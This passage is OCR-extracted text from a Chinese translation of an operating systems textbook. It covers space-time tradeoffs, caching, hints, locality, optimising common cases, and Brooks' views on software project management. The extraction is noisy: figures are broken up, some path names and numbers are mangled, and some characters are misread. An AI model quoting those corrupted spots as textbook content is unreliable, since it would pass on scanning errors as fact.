用 中 的 代码 要 差 ， 但 是 它 的 效率 更 高 ， 因 为 它 消除 了 过 程 调 用 的 开销 和 循环 的 开销 。 

我 们 可 以 更 进一步 研究 这 个 例子 。 究 竟 为 什么 计算 位 计数 ? 为 什么 不 在 一 个 表 中 查找 ?毕竟 只 有 256 
个 不 同 的 字 节 ， 每 个 字 节 具有 0 到 8 之 间 的 唯一 的 值 。 我 们 可 以 声明 一 个 256 项 的 表 bits， 每 一 项 (在 编译 
时 ) 初始 化 成 对 应 于 该 字 节 值 的 位 计数 。 采 用 这 一 方法 在 运行 时 根本 就 不 需要 计算 ， 只 要 一 个 变 址 操作 
就 可 以 了 。 图 12-7c 中 给 出 了 做 这 一 工作 的 宏 。 

这 是 用 内 存 换取 计算 时 间 的 明显 的 例子 。 然 而 ， 我 们 还 可 以 再 进一步 。 如 果 需 要 整个 32 位 字 的 位 计 
数 ， 使 用 我 们 的 bit_count 宏 ， 每 个 字 我 们 需要 执行 四 次 查找 。 如 果 将 表 扩 展 到 65 536 项 ， 每 个 字 查找 两 
次 就 足够 了 ， 代 价 是 更 大 的 表 。 

在 表 中 查找 答案 可 以 用 在 其 他 方面 。 一 种 著名 的 图 像 压 缩 技术 GIF， 使 用 表 查 找 来 编码 24 位 RGB 图 
像 。 然 而 ，GIF 只 对 具有 256 种 颜色 或 更 少 颜色 的 图 像 起 作用 。 对 于 每 幅 要 压缩 的 图 像 ， 构 造 一 个 256 项 
的 调 色 板 ， 每 一 项 包含 一 个 24 位 的 RGB 值 。 压 缩 过 的 图 像 于 是 包含 每 个 像素 的 8 位 索引 ， 而 不 是 24 位 颜 
色 值 ， 增 益 因 子 为 3。 图 12-8 中 针对 一 幅 图 像 的 一 个 4x 4 区 域 说 明了 这 一 思想 。 原 始 未 压缩 的 图 像 如 图 
12-8a 所 示 ， 该 图 中 每 个 取 值 是 一 个 24 位 的 值 ， 每 8 位 给 出 红 、 绿 和 蓝 的 强度 。GIF 图 像 如 图 12-8b 所 示 ， 
该 图 中 每 个 取 值 是 一 个 进入 调 色 板 的 8 位 索引 。 调 色 板 作为 图 像 文件 的 一 部 分 存放 ， 如 图 12-8c 所 示 。 实 
际 上 ，GIF 算 法 的 内 容 比 这 要 多 ， 但 是 思想 的 核心 是 表 查 找 。 


24 位 8 位 








四 区 加 加 


a) b) c) 





图 12-8 a) 每 个 像素 24 位 的 未 压缩 图 像 的 局 部 ，b) 以 GIF 压缩 的 相同 局 部 ， 每 个 像素 8 位 ，c) 调 色 板 
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与 此 同时 ， 存 在 着 另 一 种 方法 可 以 压缩 图 像 ， 并 且 这 种 方法 说 明了 一 种 不 同 的 权衡 方法 。PostScript 是 
一 种 程序 设计 语言 ， 可 以 用 来 描述 图 像 (实际 上 ， 任 何 程序 设计 语言 都 可 以 描述 图 像 ， 但 是 PostScript 专 为 
这 一 目的 进行 了 调节 )。 许 多 打印 机 具有 内 内 的 PostScript 解 释 器 ， 能 够 运行 发 送 给 它们 的 PostScript 程 序 。 

例如 ， 如 果 在 一 幅 图 像 中 存在 一 个 像素 矩形 块 具 有 相同 的 颜色 ， 用 于 该 图 像 的 PostScript 程 序 将 携带 
指令 ， 用 来 将 一 个 矩形 放置 在 一 定 的 位 置 并 且 用 一 定 的 颜色 填充 该 矩形 。 只 需要 少数 几 个 位 就 可 以 发 出 此 
命令 。 当 打印 机 接收 图 像 时 ， 打 印 机 中 的 解释 器 必须 运行 程序 才能 绘制 出 图 像 。 因 此 ，PostScript 以 更 多 的 
计算 为 代价 实现 了 数据 压缩 ， 这 是 与 表 查 找 不 同 的 一 种 权衡 ， 但 是 当 内 存 或 带宽 不 足 时 是 频 有 价值 的 。 

其 他 的 权衡 经 常 牵涉 数据 结构 。 双 向 链表 比 单 向 链表 占据 更 多 的 内 存 ， 但 是 经 常 使 得 访问 表 项 速度 
更 快 。 散 列表 甚至 更 浪费 空间 ， 但 是 要 更 快 。 简 而 言 之 ， 当 优化 一 段 代码 时 要 考虑 的 重要 事情 之 一 是 : 
使 用 不 同 的 数据 结构 是 否 将 产生 最 佳 的 时 间 一 空间 平衡 。 


12.4.4 缓存 

用 于 改进 性 能 的 一 项 众所周知 的 技术 是 缓存 。 在 任何 相同 的 结果 可 能 需要 被 获取 多 次 的 情况 下 ， 缓 
存 都 是 适用 的 。 一 般 的 方法 是 首先 做 完整 的 工作 ， 然 后 将 结果 保存 在 缓存 中 。 对 于 后 来 的 获取 结果 的 工 
作 ， 首 先 要 检查 缓存 。 如 果 结 果 在 缓存 中 ， 就 使 用 它 。 否 则 ， 再 做 完整 的 工作 。 

我 们 已 经 看 到 缓存 在 文件 系统 内 部 的 运用 ， 在 缓存 中 保存 一 定数 目 最 近 用 过 的 磁盘 块 ， 这 样 在 每 次 
命中 时 就 可 以 省 略 磁盘 读 操作 。 然 而 ， 缓 存 还 可 以 用 于 许多 其 他 目的 。 例 如 ， 解 析 路 径 名 的 代价 就 高 昂 
得 令 人 吃惊 。 再 次 考虑 图 4-34 中 UNIX 的 例子 。 为 了 查找 /usr/ast/mbox， 需 要 如 下 的 磁盘 访问 : 

1) 读 入 根 目录 的 i 节点 (i 节点 1)。 

2) 读 入 根 目录 (磁盘 块 1)。 

3) 读 入 /usr 的 i 节点 (i 节点 6)。 

4) 读 入 /usr 目 录 (磁盘 块 132) 。 

5) 读 入 /usr/ast 的 i 节点 (i 节点 26)。 

6) 读 入 /usr/ast 目 录 (磁盘 块 406)。 
只 是 为 了 获得 文件 的 i 节 点 号 就 需要 6 次 磁盘 访问 。 然 后 必须 读 
入 i 节点 本 身 以 获得 磁盘 块 号 。 如 果 文 件 小 于 块 的 大 小 (例如 [sr | 6 | 
1024 字 节 ) ， 那 么 需要 8 次 磁盘 访问 才 读 到 数据 。 a e 

某 些 系统 通过 对 (路径 ，i 节 点 ) 的 组 合 进行 缓存 来 优化 上 aa an 
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路 径 名 的 解析 。 对 于 图 4-34 的 例子 ， 在 解析 /usr/ast/mbox 之 后 ， 
高 速 缓存 中 肯定 会 保存 图 12-9 的 前 三 项 。 最 后 三 项 来 自 解析 其 
他 路 径 。 图 12-9 图 4-35 的 节点 缓存 的 局 部 

当 必 须 查找 一 个 路 径 时 ， 名 字 解 析 器 首先 查找 缓存 并 搜索 
它 以 找到 缓存 中 存在 的 最 长 的 子 字 符 串 。 例 如 ， 如 果 存 在 路 径 /usr/astgrants/stw ， 缓 存 会 返回 /usryast/ 是 i 
节点 26 这 样 的 事实 ， 这 样 搜索 就 可 以 从 这 里 开始 ， 消 除了 四 次 磁盘 访问 。 

对 路 径 进行 缓存 存在 的 一 个 问题 是 ， 文 件 名 与 i 节 点 号 之 间 的 映射 并 不 总 是 固定 的 。 假 设 文件 
/usr/ast/mbox 从 系统 中 被 删除 ， 并 且 其 i 节 点 重用 于 不 同 用 户 所 拥有 的 不 同 的 文件 。 随 后 ， 文 件 /usr/ 
ast/mbox 再 次 被 创建 ， 并 且 这 一 次 它 得 到 i 节点 106。 如 果 不 对 这 件 事情 进行 预防 ， 缓 存 项 现在 将 是 错误 
的 ， 并且 后 来 的 查找 将 返回 错误 的 i 节点 号 。 为 此 ， 当 一 个 文件 或 目录 被 删除 时 ， 它 的 缓存 项 以 及 (如 
果 它 是 一 个 目录 的 话 ) 它 下 面 所 有 的 项 都 必须 从 缓存 中 清除 。 

磁盘 块 与 路 径 名 并 不 是 能 够 缓存 的 唯一 项 目 ，i 节 点 也 可 以 被 缓存 。 如 果 弹 出 的 线程 用 来 处 理 中 断 ， 
每 个 这 样 的 线程 需要 一 个 栈 和 某 些 附加 的 机 构 。 这 些 以 前 用 过 的 线程 也 可 以 被 缓存 ， 因 为 刷新 一 个 用 过 
的 线程 比 从 头 创建 一 个 新 的 线程 更 加 容易 (为 了 避免 必须 分 配 内 存 )。 难 于 生产 的 任何 事物 几乎 都 能 够 
被 缓存 。 


12.4.5 线索 
缓存 项 总 是 正确 的 。 缓 存 搜索 可 能 失败 ， 但 是 如 果 找 到 了 一 项 ， 那 么 这 一 项 保证 是 正确 的 并 且 无 需 
再 费 周折 就 可 以 使 用 。 在 某 些 系 统 中 ， 包 含 线索 (hint) 的 表 是 十 分 便利 的 。 这 些 线索 是 关于 答案 的 提 
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示 ， 但 是 它们 并 不 保证 是 正确 的 。 调 用 者 必须 自行 对 结果 进行 验证 。 
众所周知 的 关于 线索 的 例子 是 贬 在 Web 页 上 的 URL。 点 击 一 个 链接 并 不 能 保证 被 指向 的 Web 页 就 在 
那里 。 事 实 上 ， 被 指向 的 网 页 可 能 10 年 前 就 被 删除 了 。 因 此 包含 URL 的 网 页 上 面 的 信息 只 是 一 个 线索 。 
线索 还 用 于 连接 远程 文件 。 信 息 是 提示 有 关 远 程 文件 某 些 事项 的 线索 ， 例 如 文件 存放 的 位 置 。 然 而 ， 自 
该 线索 被 记录 以 来 ， 文 件 可 能 已 经 被 移动 或 者 删除 了 ， 所 以 为 了 明确 线索 是 否 正确 ， 总 是 需要 对 其 进行 检查 。 


12.4.6 利用 局 部 性 

进程 和 程序 的 行为 并 不 是 随机 的 ， 它 们 在 时 间 上 和 空间 上 展现 出 相当 程度 的 局 部 性 ， 并 且 可 以 以 各 
种 方式 利用 该 信息 来 改进 性 能 。 空 间 局 部 性 的 一 个 常见 例子 是 : 进程 并 不 是 在 其 地 址 空间 内 部 随机 地 到 
处 跳 转 的 。 在 一 个 给 定 的 时 间 间 隔 内 ， 它 们 倾向 于 使 用 数目 比较 少 的 页 面 。 进 程 正 在 有 效 地 使 用 的 页 面 
可 以 被 标记 为 它 的 工作 集 ， 并 且 操 作 系统 能 够 确保 当 进 程 被 允许 运行 时 ， 它 的 工作 集 在 内 存 中 ， 这 样 就 
减少 了 缺 页 的 次 数 。 

局 部 化 原理 对 于 文件 也 是 成 立 的 。 当 一 个 进程 选择 了 一 个 特定 的 工作 目录 时 ， 很 可 能 将 来 许多 文件 
引用 将 指向 该 目录 中 的 文件 。 通 过 在 磁盘 上 将 每 个 目录 的 所 有 i 节点 和 文件 就 近 放 在 一 起 ， 可 能 会 获得 
性 能 的 改善 。 这 一 原理 正 是 Berkeley 快 速 文件 系统 的 基础 (McKusick A, 1984), 

局 部 性 起 作用 的 另 一 个 领域 是 多 处 理 器 系统 中 的 线程 调度 。 正 如 我 们 在 第 8 章 中 看 到 的 ， 在 多 处 理 
器 上 一 种 调度 线程 的 方法 是 试图 在 最 后 一 次 用 过 的 CPU 上 运行 每 个 线程 ， 期 望 它 的 某 些 内 存 块 依然 还 在 
内 存 的 缓存 中 。 


12.4.7 优化 常见 的 情况 

区 分 最 常见 的 情况 和 最 坏 可 能 的 情况 并 且 分 别处 理 它们 ， 这 通常 是 一 个 好 主意 。 针 对 这 两 者 的 代码 
常常 是 相当 不 同 的 。 重 要 的 是 要 使 常见 的 情况 速度 快 。 对 于 最 坏 的 情况 ， 如 果 它 很 少 发 生 ， 使 其 正确 就 
足够 了 。 

第 一 个 例子 ， 考 虑 进入 一 个 临界 区 。 在 大 多 数 时 间 中 是 可 以 成 功 进入 的 ， 特 别 是 如 果 进 程 在 临界 区 
内 部 不 花费 很 多 时 间 的 话 。Windows 8 提供 的 一 个 Win API 调 用 EnterCriticalSection 就 利用 了 这 一 期 望 ， 
它 自动 地 在 用 户 态 测 试 一 个 标志 (使 用 TSL 或 等 价 物 )。 如 果 测 试 成 功 ， 进 程 只 是 进入 临界 区 并 且 不 需要 
内 核 调 用 。 如 果 测 试 失败 ， 库 过 程 将 调用 一 个 信号 量 上 的 down 操 作 以 阻塞 进程 。 因 此 ， 在 通常 情况 下 是 
不 需要 内 核 调 用 的 。 在 第 2 章 中 可 以 见 到 ，Linux 中 的 快速 用 户 区 互 斥 也 无 争议 地 为 常见 情况 做 了 优化 。 

第 二 个 例子 ， 考 虑 设置 一 个 警报 (在 UNIX 中 使 用 信号 ) 。 如 果 当 前 没有 警报 待 完成 ， 那 么 构造 一 个 
警报 并 且 将 其 放 在 定时 器 队列 上 是 很 简单 的 。 然 而 ， 如 果 已 经 有 一 个 警报 待 完成 ， 那 么 就 必须 找到 它 并 
且 从 定时 器 队列 中 删除 。 由 于 alarm 调 用 并 未 指明 是 否 已 经 设置 了 一 个 警报 ， 所 以 系统 必须 假设 最 坏 的 
情况 ， 即 有 一 个 警报 。 然 而 ， 由 于 大 多 数 时 间 不 存在 警报 待 完成 ， 并 且 由 于 删除 一 个 现 有 的 警报 代价 高 
昂 ， 所 以 区 分 这 两 种 情况 是 一 个 好 主意 。 

做 这 件 事 情 的 一 种 方法 是 在 进程 表 中 保留 一 个 位 ， 表 明 是 否 有 一 个 警报 待 完成 。 如 果 这 一 位 为 0， 
就 好 办 了 (只 是 添加 一 个 新 的 定时 器 队列 项 而 无 须 检查 )。 如 果 该 位 为 1!1， 则 必须 检查 定时 器 队列 。 


12.5 项 目 管理 


程序 员 是 天 生 的 乐观 主义 者 。 他 们 中 的 大 多 数 认为 编写 程序 的 方式 就 是 急切 地 奔 向 键盘 并 且 开 始 击 
键 ， 不 久 以 后 完全 调试 好 的 程序 就 完成 了 。 对 于 非常 大 型 的 程序 ， 事 实 并 非 如 此 。 在 下 面 几 节 ， 关 于 管 
理 大 型 软件 项 目 ， 特 别 是 大 型 操作 系统 项 目 ， 我 们 有 一 些 看 法 要 陈述 。 


12.5.1 人 月 神话 
经 典 著 作 《 人 月 神话 》 的 作者 Fred Brooks 是 OS/360 的 设计 者 之 一 ， 他 后 来 转向 了 学 术 界 。 在 这 部 
经 典 著作 中 ，Fred Brooks 讨 论 了 建造 大 型 操作 系统 为 什么 如 此 艰难 的 问题 (Brooks, 1975, 1995) 。 当 大 
多 数 程序 员 看 到 他 声称 程序 员 在 大 型 项 目 中 每 年 只 能 产 出 1000 行 调试 好 的 代码 时 ， 他 们 怀疑 Brooks 教 授 
是 否 生活 在 外 层 空间 ， 或 许 是 在 臭虫 星 (Planet Bug 一 一 此 处 Bug 为 双关 语 ) 上 。 上 毕竟， 他 们 中 的 大 多 数 
在 熬夜 的 时 候 一 个 晚上 就 可 以 产 出 1000 行 程序 。 这 怎么 可 能 是 任何 一 个 IQ 大 于 50 的 人 一 年 的 产 出 呢 ? 
Brooks 指 出 的 是 ， 具 有 几 百 名 程序 员 的 大 型 项 目 完全 不 同 于 小 型 项 目 ， 并 且 从 小 型 项 目 获得 的 结果 并 不 
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能 放大 到 大 型 项 目 。 在 一 个 大 型 项 目 中 ， 甚 至 在 编码 开始 之 前 ， 大 量 的 时 间 就 消耗 在 规划 如 何 将 工作 划分 成 
模块 、 仔 细 地 说 明 模块 及 其 接口 ， 以 及 试图 设想 模块 将 怎样 互相 作用 这 样 的 事情 上 。 然 后 ， 模 块 必须 独立 地 
编码 和 调试 。 最 后 ， 模 块 必须 集成 起 来 并 且 必 须 将 系统 作为 一 个 整体 来 测试 。 通 常 的 情况 是 ， 每 个 模块 单独 
测试 时 工作 得 十 分 完美 ， 但 是 当 所 有 部 分 集成 在 一 起 时 ， 系 统 立 刻 崩 溃 。Brooks 将 工作 量 估计 如 下 ， 

。1/3 规 划 

。1/6 编 码 

。1/4 模 块 测试 

。1/4 系 统 测试 

换言之 ， 编 写 代 码 是 容易 的 部 分 ， 困 难 的 部 分 是 断定 应 该 有 哪些 模块 并 且 使 模块 A 与 模块 B 正 确 地 
交互 。 在 由 一 名 程序 员 编 写 的 小 型 程序 中 ， 留 待 处 理 的 所 有 部 分 都 是 简单 的 部 分 。 

Brooks 的 书 的 标题 来 自 他 的 断言 ， 即 人 与 时 间 是 不 可 互 换 的 。 不 存在 “人 月 ”这 样 的 单位 。 如 果 一 
个 项 目 需要 15 个 人 花 2 年 时 间 构 建 ， 很 难 想象 360 个 人 能 够 在 1 个 月 内 构建 它 ， 甚 至 让 60 个 人 在 6 个 月 内 做 
出 它 或 许 也 是 不 可 能 的 。 

产生 这 一 效应 有 三 个 原因 。 第 一 ， 工 作 不 可 能 完全 并 行 化 。 直 到 完成 规划 并 且 确 定 了 需要 哪些 模块 
以 及 它们 的 接口 ， 甚 至 都 不 能 开始 编码 。 对 于 一 个 2 年 的 项 目 ， 仅 仅 规划 可 能 就 要 花费 8 个 月 。 

第 二 ,为 了 完全 利用 数目 众多 的 程序 员 ， 工作 必须 划分 成 数目 众多 的 模块 ， 这 样 每 个 人 才能 有 事情 做 。 
由 于 每 个 模块 可 能 潜在 地 与 每 个 其 他 模块 相互 作用 ， 需 要 将 模块 -模块 相互 作用 的 数目 看 成 随 着 模块 数目 
的 平方 而 增长 ， 也 就 是 说 ， 随 着 程序 员 数 目的 平方 而 增长 。 这 一 复杂 性 很 快 就 会 失去 控制 。 对 于 大 型 项 目 
而 言 ， 人 与 月 之 间 的 权衡 远 不 是 线性 的 ， 对 63 个 软件 项 目 精细 的 测量 证 实 了 这 一 点 (Boehm, 1981)。 

第 三 , 调试 工作 是 高 度 序列 化 的 。 对 于 一 个 问题 ,安排 10 名 调试 人 员 并 不 会 加 快 10 倍 发 现 程序 错误 。 
事实 上 ，10 名 调试 人 员 或 许 比 一 名 调试 人 员 还 要 惕 ， 因 为 他 们 在 相互 沟通 上 要 浪费 太 多 的 时 间 。 

对 于 人 员 与 时 间 的 权衡 ，Brooks 将 他 的 经 验 总 结 在 Brooks 定 律 中 : 

对 于 一 个 延期 的 软件 项 目 ， 增 加 人 力 将 使 它 延 期 更 久 。 

增加 人 员 的 问题 在 于 他 们 必须 在 项 目 中 获得 培训 ， 模 块 必须 重新 划分 以 便 与 现在 可 用 的 更 多 数目 的 
程序 员 相 匹 配 ， 需 要 开 许 多 会 议 来 协调 各 方面 的 努力 等 。Abdel-Hamid 和 Madnick (1991) 用 实验 方法 
证 实 了 这 一 定律 。 用 稍稍 不 敬 的 方法 重 述 Brooks 定 律 就 是 : 

无 论 分 配 多 少妇 女 从 事 这 一 工作 ， 生 一 个 孩子 都 需要 9 个 月 。 


12.5.2 团队 结构 

商业 操作 系统 是 大 型 的 软件 项 目 ， 总 是 需要 大 型 的 人 员 团 队 。 人 员 的 质量 极为 重要 。 几 十 年 来 人 们 
已 经 众所周知 的 是 ， 顶 尖 的 程序 员 比 拙劣 的 程序 员 生 产 率 要 高 出 10 倍 (Sackman 等 人 ，1968)。 麻 烦 在 于 ， 
当 你 需要 200 名 程序 员 时 ， 找 到 200 名 顶尖 的 程序 员 非 常 困 难 ， 对 于 程序 员 的 质量 你 不 得 不 有 所 将 就 。 

在 任何 大 型 的 设计 项 目 (软件 或 其 他 ) 中 ， 同 样 重要 的 是 需要 体系 结构 的 一 致 性 。 应 该 有 一 名 才智 
超群 的 人 对 设计 进行 控制 。Brooks 引 证 兰 斯 大 教堂 8 作为 大 型 项 目的 例子 ， 兰 斯 大 教堂 的 建造 花费 了 几 
十 年 的 时 间 ， 在 这 一 过 程 中 ， 后 来 的 建筑 师 完全 服从 于 完成 最 初 风格 的 建筑 师 的 规划 。 结 果 是 其 他 欧洲 
大 教堂 无 可 比拟 的 建筑 结构 的 一 致 性 。 

在 20 世 纪 70 年 代 ，Harlan Mills 把 “一 些 程序 员 比 其 他 程序 员 要 好 很 多 ”的 观察 结果 与 对 体系 结构 
一 致 性 的 需要 相 结 合 ， 提 出 了 首席 程序 员 团队 (chief programmer team) 的 范式 (Baker, 1972)。 他 的 思 
想 是 要 像 一 个 外 科 和 手术 团队 ， 而 不 是 像 一 个 杀 猪 屠夫 团队 那样 组 织 一 个 程序 员 团 队 。 不 是 每 个 人 像 疯 子 
一 样 乱 砍 一 气 ， 而 是 由 一 个 人 掌握 着 手术 刀 ， 其 他 人 在 那里 提供 支持 。 对 于 一 个 10 名 人 员 的 项 目 ，Mills 
建议 的 团队 结构 如 图 12-10 所 示 。 

自从 提出 这 一 建议 并 付 诸 实 施 ，30 年 过 去 了 。 一 些 事情 已 经 变化 (例如 需要 一 个 语言 层 一 一 C 比 
PL/I 更 为 简单 ) ， 但 是 只 需要 一 名 才智 超群 的 人 员 对 设计 进行 控制 仍然 是 正确 的 。 并 且 这 名 才智 超群 者 
在 设计 和 编程 上 应 该 能 够 100% 地 起 作用 ， 因 此 需要 支持 人 员 。 尽 管 借助 于 计算 机 的 帮助 ， 现 在 一 个 更 


日 兰 斯 (Reims) 是 法 国 东北 部 城市 。 一 一 译 者 注 
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小 的 支持 人 员 队伍 就 足够 了 。 但 是 在 本 质 上 ， 这 一 思想 仍然 是 有 效 的 。 














| 副手 | 辅助 首席 程序 员 并 为 其 提供 咨询 
管理 人 人员、 预算、 空间 、 设 备 、 报 告 等 
编辑 文档 ， 而 文档 必须 由 首席 程序 员 编写 
v 行政 主管 和 编辑 各 需要 一 名 秘书 
| 程序 文书 | 维护 代码 和 文档 档案 | 
| 工具 师 “| 提供 首席 程序 员 需 要 的 任何 工具 
| 测试 员 | 测试 首席 程序 员 的 代码 | 


语言 律师 兼职 人 员 ， 他 可 以 就 语言 向 首席 程序 员 提 供 建议 
















图 12-10 Mills 建 议 的 10 人 首席 程序 员 团 队 的 分 工 


任何 大 型 项 目 都 需要 组 织 成 层次 结构 。 底 层 是 许多 小 的 团队 ， 每 个 团队 由 首席 程序 员 领 导 。 在 下 一 
层 ， 必 须 由 一 名 经 理 人 对 一 组 团队 进行 协调 。 经 验 表 明 ， 你 所 管理 的 每 一 个 人 将 花费 你 10% 的 时 间 ， 所 
以 每 组 10 个 团队 需要 一 个 全 职 经 理 。 这 些 经 理 也 必须 被 管理 。 

Brooks 观 察 到 ， 坏 消息 不 能 很 好 地 沿 着 树 向 上 传播 。 麻 省 理工 学 院 的 Jerry Saltzer 将 这 一 效应 称 为 
坏 消息 二 极 管 (bad-news diode) 。 因 为 存在 着 在 两 千年 前 将 带 来 坏 信息 的 信使 斩首 的 古老 传统 ， 所 以 首 
席 程序 员 或 经 理 人 都 不 愿意 告诉 他 的 老板 项 目 延 期 了 4 个 月 ， 并 且 无 论 如 何 都 没有 满足 最 终 时 限 的 机 会 。 
因此 ， 顶 层 管理 者 就 项 目的 状态 通常 不 明 就 里 。 当 不 能 满足 最 终 时 限 的 情况 变 得 十 分 明显 时 ， 顶 层 管理 
者 的 响应 是 增加 人 员 ， 此 时 Brooks 定 律 就 起 作用 了 。 

实际 上 ， 大 型 公司 拥有 生产 软件 的 丰富 经 验 并 且 知 道 如 果 它 随意 地 生产 会 发 生 人 什么， 这样 的 公司 趋 
向 于 至 少 是 试图 正确 地 做 事情 。 相 反 ， 较 小 的 、 较 新 的 公司 ， 匆 匆忙 忙 地 希望 其 产品 早日 上 市 ， 不 能 总 
是 仔细 地 生产 他 们 的 软件 。 这 经 常 导 致远 远 不 是 最 优化 的 结果 。 

Brooks 和 Mills 都 没有 预见 到 开放 源码 运动 的 成 长 。 尽 管 很 多 人 进行 了 质疑 (特别 是 业界 领先 的 闭 
源 软件 公司 ) ， 但 开源 软件 还 是 取得 了 巨大 的 成 功 。 从 大 型 服务 器 到 嵌入 式 设 备 ， 从 工业 控制 系统 到 智 
能 手机 ， 开 源 软 件 无 处 不 在 。Google 和 IBM 等 大 公司 正在 大 力 支持 Linux ， 并 对 其 代码 做 出 了 巨大 贡献 。 
值得 注意 的 是 ， 最 为 成 功 的 开放 源码 软件 项 目 显然 使 用 了 首席 程序 员 模 型 ， 有 一 名 才智 超群 者 控制 着 体 
系 结 构 设计 (例如 ，Linus Torvalds 控 制 着 Linux 内 核 Richard Stallman 控 制 着 GNU C 编 译 器 ) 。 


12.5.3 经 验 的 作用 

拥有 丰富 经 验 的 设计 人 员 对 于 一 个 操作 系统 项 目 来 说 至 关 重要 。Brooks 指 出 ， 大 多 数 错误 不 是 在 代 
码 中 ， 而 是 在 设计 中 。 程 序 员 正确 地 做 了 吟 只 他 们 要 做 的 事情 ， 而 吟 哇 他 们 要 做 的 事情 是 错误 的 。 再 多 
测试 软件 都 无 法 弥补 糟糕 的 设计 说 明 书 。 

Brooks 的 解决 方案 是 放弃 图 12-11a 的 经 典 开 发 模型 而 采用 图 12-11b 的 模型 。 此 处 的 想法 是 首先 编写 
一 个 主 程序 ， 它 仅仅 调用 顶层 过 程 ， 而 顶层 过 程 最 初 是 哑 过 程 。 从 项 目的 第 一 天 开始 ， 系 统 就 可 以 编译 
和 运行 ， 尽 管 它 什么 都 做 不 了 。 随 着 时 间 的 流逝 ， 模 块 被 插入 到 完全 的 系统 中 。 这 一 方法 的 成 效 是 系统 
集成 测试 能 够 持续 地 执行 ， 这 样 设计 中 的 错误 就 可 以 更 早 地 显露 出 来 ， 从 而 让 拙劣 的 设计 决策 导致 的 学 
习 过 程 更 早 开始 。 

缺乏 知识 是 一 件 危险 的 事情 。Brooks 注 意 到 被 他 称 为 第 二 系统 效应 (second system effect) 的 现象 。 
一 个 设计 困 队 生产 的 第 一 件 产品 经 常 是 最 小 化 的 ， 因 为 设计 人 员 担 心 它 可 能 根本 就 不 能 工作 。 结 果 ， 
他 们 在 加 入 许多 功能 特性 方面 是 迟疑 的 。 如 果 项 目 取得 成 功 ， 他 们 会 构建 后 续 的 系统 。 由 于 被 他 们 自 
己 的 成 功 所 感动 ， 设 计 人 员 在 第 二 次 会 包含 所 有 华而不实 的 东西 ， 而 这 些 是 他 们 在 第 一 次 有 意 省 去 的 。 
结果 ， 第 二 个 系统 腔 肿 不 堪 并 且 性 能 低劣 。 第 二 个 系统 的 失败 使 他 们 在 第 三 次 冷静 下 来 并 且 再 次 小 心 
谨慎 。 
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测试 


a) b) 


图 12-11 a) 传统 的 分 阶段 软件 设计 过 程 ，b) 另 一 种 设计 在 第 一 天 开始 就 产生 一 个 (什么 都 不 做 的 ) 工作 系统 


就 这 一 点 而 言 ，CTSS 和 MULTICS 这 一 对 系统 是 一 个 明显 的 例子 。CTSS 是 第 一 个 通用 分 时 系统 并 
且 取得 了 巨大 的 成 功 ， 尽 管 它 只 有 最 小 化 的 功能 。 它 的 后 继 者 MULTICS 过 于 野心 勃勃 并 因此 而 吃 尽 了 
苦头 。MULTICS 的 想法 是 很 好 的 ， 但 是 由 于 存在 太 多 新 的 东西 所 以 多 年 以 来 系统 的 性 能 十 分 低劣 并 且 
绝对 不 是 一 个 重大 的 商业 成 功 。 在 这 一 开发 路 线 中 的 第 三 个 系统 UNIX 则 更 加 小 心 谨慎 并 且 更 加 成 功 。 


12.5.4 没有 银 弹 

除了 《人 月 神话 》，Brooks 还 写 了 一 篇 有 影响 的 学 术 论文 ， 称 为 “No Silver Bullet”( 没 有 银 弹 ) 
(Brooks, 1987)。 在 这 篇 文章 中 ， 他 主张 在 十 年 之 内 由 各 色 人 等 兜售 的 灵丹妙药 中 ， 没 有 一 样 能 够 在 软 
件 生 产 率 上 产生 数量 级 的 改进 。 经 验 表明 他 是 正确 的 。 

在 建议 的 银 弹 中 ， 包 括 更 好 的 高 级 语言 、 面 向 对 象 的 程序 设计 、 人 工 智能 、 专 家 系统 、 自 动 程序 设 
计 、 图 形 化 程序 设计 、 程 序 验证 以 及 程序 设计 环境 。 或 许 在 下 一 个 十 年 将 会 看 到 一 颗 银 弹 ， 或 许 我 们 将 
只 好 满足 于 逐步 的 、 渐 进 的 改进 。 


12.6 操作 系统 设计 的 趋势 

1899 年 美国 专利 局 局 长 Charles H. Duell 请 求 当时 的 总 统 McKinley ( 麦 金利 ) 取消 专利 局 (以 及 他 
的 工作 ! )， 因 为 他 声称 “每 件 能 发 明 的 事物 都 已 经 发 明了 ”(Cerf and Navasky, 1984) 。 然 而 ，Thomas 
Edison (托马斯 爱迪生 ) 在 几 年 之 内 就 发 明了 几 件 新 的 物品 ， 包 括 电 灯 、 留 声 机 和 电影 放映 机 。 这 里 
要 说 的 就 是 ， 世 界 在 不 断 变化 ， 操 作 系统 必须 随时 适应 新 的 现实 环境 。 在 这 一 部 分 ， 我 们 会 提 到 一 些 趋 
势 ， 它 们 对 当今 的 操作 系统 开发 者 具有 重大 意义 。 

读者 请 勿 误解 ， 下 面 提 到 的 硬件 发 展 其 实 已 经 出 现 。 现 在 仍 未 出 现 的 是 能 够 有 效 使 用 它们 的 操作 系 
统 软件 。 一 般 来 说 ， 当 新 硬件 出 现时 ， 人 们 习惯 于 仅仅 将 旧 的 软件 (Linux, Windows) 在 其 上 运行 。 
从 长 远 来 看 ， 这 不 是 一 个 好 主意 。 我 们 真正 需要 的 是 ， 利 用 创新 软件 来 处 理 创新 硬件 。 如 果 你 是 一 个 计 
算 机 科学 或 计算 机 工程 专业 的 学 生 ， 或 者 一 个 信息 通信 技术 的 专业 人 士 ， 你 的 家 庭 作 业 就 是 思考 如 何 设 
计 这 样 的 软件 。 


12.6.1 虚拟 化 与 云 
虚拟 化 再 次 到 来 ， 它 第 一 次 出 现在 1967 年 的 IBM 
CP/CMS 系 统 中 ， 现 在 它 重 回 x86 平 台 。 许 多 电脑 现在 在 
裸 机 上 运行 虚拟 机 管理 程序 ， 如 图 12-12 所 示 。 虚 拟 机 ”虚拟 机 
管理 程序 会 运行 多 个 虚拟 机 ， 每 个 虚拟 机 有 单独 的 操作 
系统 。 这 种 现象 在 第 7 章 已 经 讨论 过 ， 并 且 是 未 来 的 发 
展 趋势 。 现 在 ， 很 多 公司 正在 通过 对 其 他 资源 进行 虚拟 
化 ， 进 一 步 深化 这 种 思路 。 例 如 ， 人 们 对 网 络 设备 控制 
的 虚拟 化 研究 兴趣 很 浓厚 ， 甚 至 到 了 在 云 中 对 它们 的 网 图 12-12 运行 4 个 虚拟 机 的 管理 程序 
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络 进行 控制 的 程度 。 除 此 之 外 ,制造 商 和 研究 者 们 持续 地 研究 如 何 使 虚拟 机 管理 程序 从 概念 上 做 得 更 好 ， 
包括 更 小 、 更 快 和 资源 隔离 更 可 信 。 


126.2 众 核 芯片 

